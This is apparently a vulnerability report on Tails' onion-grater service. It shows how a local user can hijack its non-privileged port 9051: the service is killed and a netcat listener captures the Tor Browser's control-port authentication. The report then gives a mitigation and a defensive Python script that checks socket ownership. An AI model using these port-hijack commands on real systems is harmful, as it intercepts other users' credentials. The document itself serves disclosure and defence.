MITM of onion-grater service
Since the onion-grater service listens on a non-privileged port, any local user can race it and bind a socket to that port before the service does. An attacker who wins that race can then forge messages or read information meant for the service.
The following shows an example (as root), just for demonstration purposes:
We see that the port is already bound by a PID:
amnesia@amnesia:~/$ sudo netstat -tulpen
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode      PID/Program name
tcp        0      0 0.0.0.0:9051            0.0.0.0:*               LISTEN      0          20693      5297/python3
The port is bound by the
amnesia@amnesia:~/$ ps -aux | grep 5297
root      5297  0.5  0.4 656384 39748 ?        Ssl  Mar30   3:05 /usr/bin/python3 -u /usr/local/lib/onion-grater --listen-address 0.0.0.0
We kill the application as root and bind the port as the low-privileged amnesia user:
sudo kill -9 5297
nc -lvp 9051
We start the Tor Browser with /usr/local/lib/run-tor-browser-in-netns and get the following output:
Listening on 0.0.0.0 9051
Connection received on 10.200.1.2 53884
authenticate passwd
- Run all the services on privileged ports, which an unprivileged local user cannot bind
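As an added, defender-side example (this is not code from Tails or the onion-grater project): a small Python check that parses the /proc/net/tcp table and reports which uid owns the LISTEN socket on a given port, so a client or a monitoring job can refuse to send its authentication to a control-port listener that is not owned by root. The /proc/net/tcp rows embedded below are constructed for the demo; the path, the port 9051 and the expected uid 0 are assumptions matching the report above.

```python
"""Report which local uid owns the listening socket on a TCP port.

Added example, not part of Tails or onion-grater. Parses the
/proc/net/tcp format (Linux) so that a client can verify the listener it
is about to talk to is owned by root before it sends "authenticate".
"""
import socket
import struct

TCP_LISTEN = "0A"          # socket state column value for LISTEN
CONTROL_PORT = 9051        # assumption: the onion-grater port from the report
EXPECTED_UID = 0           # assumption: the service should run as root

# Constructed sample of /proc/net/tcp (header + two listeners).
# Port 9051 is 0x235B and is owned by uid 0 here; port 9050 (0x235A)
# is owned by uid 1000, standing in for a listener bound by a normal user.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:235B 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20693 1 0000000000000000 100 0 0 10 0
   1: 00000000:235A 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 31337 1 0000000000000000 100 0 0 10 0
"""


def parse_proc_net_tcp(text):
    """Yield (local_ip, local_port, state, uid, inode) for each data row."""
    for line in text.splitlines()[1:]:        # first line is the header
        fields = line.split()
        if len(fields) < 10:                  # blank or truncated row
            continue
        ip_hex, port_hex = fields[1].split(":")
        # local_address is host byte order hex; unpack as little-endian
        # which is what x86/ARM Linux writes into /proc/net/tcp
        ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
        yield ip, int(port_hex, 16), fields[3], int(fields[7]), int(fields[9])


def listener_uid(port, table_text):
    """Return the uid owning the LISTEN socket on `port`, or None if none."""
    for _ip, lport, state, uid, _inode in parse_proc_net_tcp(table_text):
        if lport == port and state == TCP_LISTEN:
            return uid
    return None


def listener_is_trusted(port, table_text, expected_uid=EXPECTED_UID):
    """True only if a LISTEN socket exists on `port` and is owned by expected_uid."""
    uid = listener_uid(port, table_text)
    return uid is not None and uid == expected_uid


def check_live(port=CONTROL_PORT, expected_uid=EXPECTED_UID, path="/proc/net/tcp"):
    """Run the check against the live kernel table (Linux only)."""
    with open(path) as fh:
        return listener_is_trusted(port, fh.read(), expected_uid)


if __name__ == "__main__":
    # Demo on the constructed table: 9051 passes, 9050 is rejected.
    for port in (9051, 9050):
        owner = listener_uid(port, SAMPLE_PROC_NET_TCP)
        verdict = "trusted" if listener_is_trusted(port, SAMPLE_PROC_NET_TCP) else "REJECT"
        print(f"port {port}: owner uid {owner} -> {verdict}")
```

This check only detects a listener that has already been taken over by a non-root uid; it does not close the race window, because a process could still grab the port between the lookup and the connect. It is therefore a monitoring aid, not a substitute for the mitigation listed above (a privileged port, or a Unix socket with SO_PEERCRED, where the peer's identity is established by the kernel on the connection itself).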